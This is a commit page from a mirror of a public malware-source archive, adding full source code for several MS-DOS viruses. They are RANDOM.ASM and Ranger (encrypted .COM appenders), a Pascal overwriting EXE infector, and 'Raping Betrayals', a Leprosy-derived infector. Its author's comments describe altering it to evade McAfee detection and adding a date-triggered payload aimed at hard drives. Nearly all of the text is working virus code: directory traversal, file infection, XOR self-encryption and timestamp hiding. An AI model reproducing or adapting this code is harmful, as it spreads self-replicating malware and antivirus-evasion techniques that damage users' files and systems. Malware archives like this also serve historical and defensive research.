daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/R-Index/Virus.MSDOS.Unknown.random.asm
+337
View File
@@ -0,0 +1,337 @@
; RANDOM.ASM -- Random To all Ports
; Written by The Wz!
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call search_files ; Find and infect a file
call search_files ; Find and infect another file
xor ah,ah ; BIOS get time function
int 01Ah
test dx,0001h ; Is timer divisible by 2?
jne no_infection ; If not then don't spread
call search_files ; Find and infect a file
no_infection:
xor ah,ah ; BIOS get time function
int 1Ah
xchg dx,ax ; AX holds low word of timer
mov dx,0FFh ; Start with port 255
out_loop: out dx,al ; OUT a value to the port
dec dx ; Do the next port
jne out_loop ; Repeat until DX = 0
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
vcl_marker db "[VCL]",0 ; VCL creation marker
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
MSDOS/R-Index/Virus.MSDOS.Unknown.ranger.asm
+248
View File
@@ -0,0 +1,248 @@
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: ; handles encryption and decryption
mov cx,(offset heap - offset startencrypt)/2 ; iterations
patch_startencrypt:
mov di,offset startencrypt ; start of decryption
decrypt_loop:
db 81h,35h ; xor word ptr [di], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc di ; calculate new decryption location
inc di
loop decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsw
movsb
mov byte ptr [bp+numinfec],1 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+com_mask]
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc done_infections ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
cmp ax,2000 ; Is it too small?
jb find_next
cmp ax,65535-(endheap-decrypt) ; Is it too large?
ja find_next
mov bx,word ptr [bp+buffer+1]; get jmp location
add bx,heap-decrypt+3 ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
jmp activate ; Always activate
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
int 21h
retn ; 100h is on stack
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
activate: ; ******************************
mov ax,04301h ; DOS set file attributes function
xor cx,cx ; File will have no attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ax,03D02h ; DOS open file function, r/w
lea dx,[di + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; Transfer file handle to AX
jmp exit_virus
creator db '[ZEB(C)1992]',0 ; Mass Produced Code Generator
virusname db '[ranger]',0
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
get_encrypt_value:
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
or dx,dx ; Check if encryption value = 0
jz get_encrypt_value ; Get another if it is
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb
add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
jmp done_infections
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bx
push bp
endwrite:
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
com_mask db '*.com',0
dot_dot db '..',0
heap: ; Variables not in code
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point
MSDOS/R-Index/Virus.MSDOS.Unknown.ranovr.pas
+157
View File
@@ -0,0 +1,157 @@
{close but not cookie ranmas4A}
USES dos,link,attrib;
CONST vSize=8608;
VAR PATHLIST,
fileLIST: LISTtype;
TempPtr : NodePtr;
current : byte;
count : integer; {debug}
Running : string;
buffer : array[0..vSize] of byte;
header : array[0..$1A] of byte;
F : file;
vID : string[2];
procedure SuckPaths(var lister: listTYPE);
{Get paths from command environmet}
{Split string into seperate paths }
{Include running path in list }
var
ps, s: string;
ind: integer;
begin
s:= GetEnv('PATH');
ind:= pos(';', S);
GetDir(0,PS);
insertNODE(lister,ps);
if ind<0 then while ind< 0 do BEGIN
ps:= copy(S, 1, ind-1);
{debug} if (random(2)=1) then insertNODE(lister,ps);
delete(S,1,ind);
ind:= pos(';', S);
END;
end;
procedure SuckFiles(path: string; var exes:LISTtype);
{find EXE files in path given }
{return linked list }
var Fil :SearchRec;
BEGIN
{current:=0;}
IF path[ length(path) ]<'\' then path:=path+'\';
{change to *.EXE to make live}
findfirst(path+'*.222',anyfile,fil);
while DosError=0 do begin
If (pos('.',fil.name)<1) and not(boolean(fil.attr and directory)) then
begin
inc(count);
if random(20)=5 then begin {debug}
if (fil.size<$ffff) then begin
InsertNode(exes,(path+fil.name));
{ current:=1; }
end;
end; {debug}
end;
if current=1 then dosError:=18
else findnext(fil); {give "no more files" effect to exit}
end;
END;
{::Skeleton Main::}
BEGIN
randomize; count:=0; initLIST (pathLIST);
vID:='FU';
{::Get cur & PATH's dos's environment::}
SuckPaths(pathLIST); {pick about 1 out of 2 paths from the PATH envir}
{::Pick files from paths::}
TempPtr:=pathLIST.first; {pick 1 name max in every path for checking}
While ( TempPtr<nil ) do BEGIN
suckFiles(TempPtr^.info,fileLIST);
TempPtr:= TempPtr^.link;
END;
killList(pathList);
{::get buffer::}
Running:=ParamStr(0); {get name of the file currently running}
Running:=FExpand(Running);
Assign(F,running);
reset(f,1);
seek(f,0);
blockRead(f,buffer[0],vSize);
close(f);
move(vID[1],buffer[$12],2);
TempPtr:=fileLIST.first;
While ( TempPtr<nil ) do BEGIN
Assign(F,TempPtr^.info);
SetfileATTR(TempPtr^.info,'hsra',false);
Reset(f,1);
Blockread(F,header[0],$1A);
IF (Chr(header[$12])<'F') or
(Chr(header[$13])<'U') then BEGIN
TempPtr^.link:=NIL; {stop search}
seek(F,0);
Blockwrite(F,buffer,vSize);
END;
Close(F);
TempPtr:= TempPtr^.link;
END;
killList(fileList);
writeLN('Disk Read Error');
{change to 0 to make live}
repeat until 1=1{0};
END.
LINK.PAS:
unit link;
INTERFACE
Type
NodePtr=^Node;
Node= record
Info: String[40];
Link: NodePtr;
end;
ListType=record
First: NodePtr;
last : NodePtr;
end;
{var
TheList : ListType;
{MemSize : longInt;}
{TempList:NodePtr;}
procedure initList( Var thelist: listType);
Procedure InsertNode( var theLIST: listType; Stuff: string );
procedure KillList(var theLIst: listTYPE);
IMPLEMENTATION
procedure initList( var thelist: listType);
begin
TheLIST.First:=NIL;
TheLIST.last:= NIL;
end;
Procedure InsertNode( var theLIST: listType; Stuff: string );
var
Temp,
TempNode: NodePtr;
begin
Temp:=TheList.first; {borrow start}
New ( TempNode ); {.............}
TempNode^.Info:= Stuff; {make new node}
TempNode^.Link:= nil; {.............}
If ( Temp=nil ) then
begin
TheList.first:=TempNode; {both point at single node}
TheList.last :=TempNode;
end
ELse
begin
TheList.last^.link:=TempNode; {point last NODE to new node}
TheList.last :=TempNode; {point list END to new node}
end;
end;
procedure KillList(var theLIst: listTYPE);
var dummy,
hold: NodePtr;
begin
dummy:=thelist.first;
while dummy<nil do begin
thelist.First:=thelist.first^.link;
dispose(dummy);
dummy:=Thelist.first;
end;
end;
begin
end.
MSDOS/R-Index/Virus.MSDOS.Unknown.rapbetr.asm
+340
View File
@@ -0,0 +1,340 @@
; VirusName: Raping Betrayals
; Country : Sweden
; Author : The Unforgiven / Immortal Riot
; Date : 15/09/1993
;
;
; This is an mutation of Misery from Immortal Riot.
; I mutated this one, cuz Mcafee scan grabbed it
; within one month after we released it. So, now
; "Misery" is called "Raping Betrayls". Many
; thanks to PCM2 for the original Leprosy virus.
;
; Okey..In this version I just changed the new
; Mcafee "Scan-String", by remarking some calls.
; I also added a day checker, and if the
; virus (or a infected file) is run at the 10:th
; any month, procedure "ellie" will go off..
; Ellie is some sort of heart breaker!..<..hehe..>
;
; It copies itself into other exe/com files on the current
; drive. The file-size will not be changed, cuz it just
; replaces the code in the beginning with itselves. The
; infected files will not work, instead the virus will
; run again. The virus uses dot-dot metod for changing dirs.
;
; There has been many mutations born from Leprosy,
; and here we give you yet another contribution...
;
; McaFee Scan v108 can't find it, neither can S&S Toolkit 6.54
; Havn't tried with TBScan/F-prot, but they will probably
; identify it as "Leprosy".
;
; Regards : The Unforgiven / Immortal Riot
Title Raping Betrayals ; By The Unforgiven / Immortal Riot
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 664 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; Ä-ÄÄÄ--ÄÄ- Encrypt, save, and restore the virus code ÄÄÄ--ÄÄ--Ä-ÄÄ
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
; call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov dx,code_start ; Buffer where code starts in memory
mov cx,virus_size ; Total number of bytes to write
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
; call encrypt_decrypt ; Restore the code as it was
call daycheck ; Call function who check's for day.
ret ; Go back to where you came from
; ÄÄ-ÄÄÄÄ-ÄÄ Encrypt or decrypt the virus code ; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄ-Ä
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start
; encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor al,encrypt_val ; En/dis-engage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
; ÄÄ-ÄÄÄÄÄ---ÄÄÄÄÄ--ÄÄÄ--ÄÄÄ--ÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ----ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
; ÄÄ-ÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄ--ÄÄÄ---ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--Ä-Ä-ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
virus_code:
; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄ--ÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; "All strings are kept here in the file, and automatically encrypted"
; Okey..Thanks to Cybernetic Mutation Technology(tm), for this, but
; the virus is pretty un-use-less if Mcafee scan catch is so, I
; changed a few calls, and you can have phun with this again...
; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ-Ä--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
exe_filespec db "*.EXE",0 ; To infect EXE's
com_filespec db "*.COM",0 ; To infect COM's
newdir db "..",0 ; Move up one directory
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Fake_msg is the message that will be printed on the screen, after
; it has infected files (or when a infected file is run).
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ---ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"Betrayal is a sin, if it comes from another..$"
db " The Unforgiven / Immortal Riot " ; HUmm..that's me..
db " Dedicated to Ellie! - Lurve you! "; Love ya Ellie!
db " Sweden 15/09/93 " ; written..
; ÄÄ-ÄÄÄÄÄÄÄ----ÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Okey..these messages just are just "file-size out-fillers" or something,
; nothing important..so I remarked them, and the virus is a bit smaller...
; also check in prodedure "Exit_virus" for more info about m..
;virus_msg2 db cr,lf,tab," Something was placed here before.. $"
;virus_msg3 db cr,lf,tab," But now, it's all gone, black, sad $"
;virus_msg4 db cr,lf,tab," and empty. Empty places i my mind, $"
;virus_msg5 db cr,lf,tab," heart, life, and soul, yes, it's a sin. $"
; ÄÄ-ÄÄÄÄÄÄÄÄ---ÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If "yes", find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribs
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Move the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; Try the process on this one
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret ; Returning to base...
; ÄÄ-ÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-Ä--ÄÄÄÄÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; ELLIE:
; mov ah,09h ; Read under
; mov dx,offset virus_msg1 ; for more
; int 21h ; information
;
; Okey..If it's 10:th (any month), the virus will do something with
; your hard-drives (..ellie..) which I finds to be real nasty ! If
; you wanna check if the function day-check works, just un-mark
; the tree lines under the first "ellie". and the virus_msg1
; "Betrayal is a sin, if it comes from another" will be displayed.
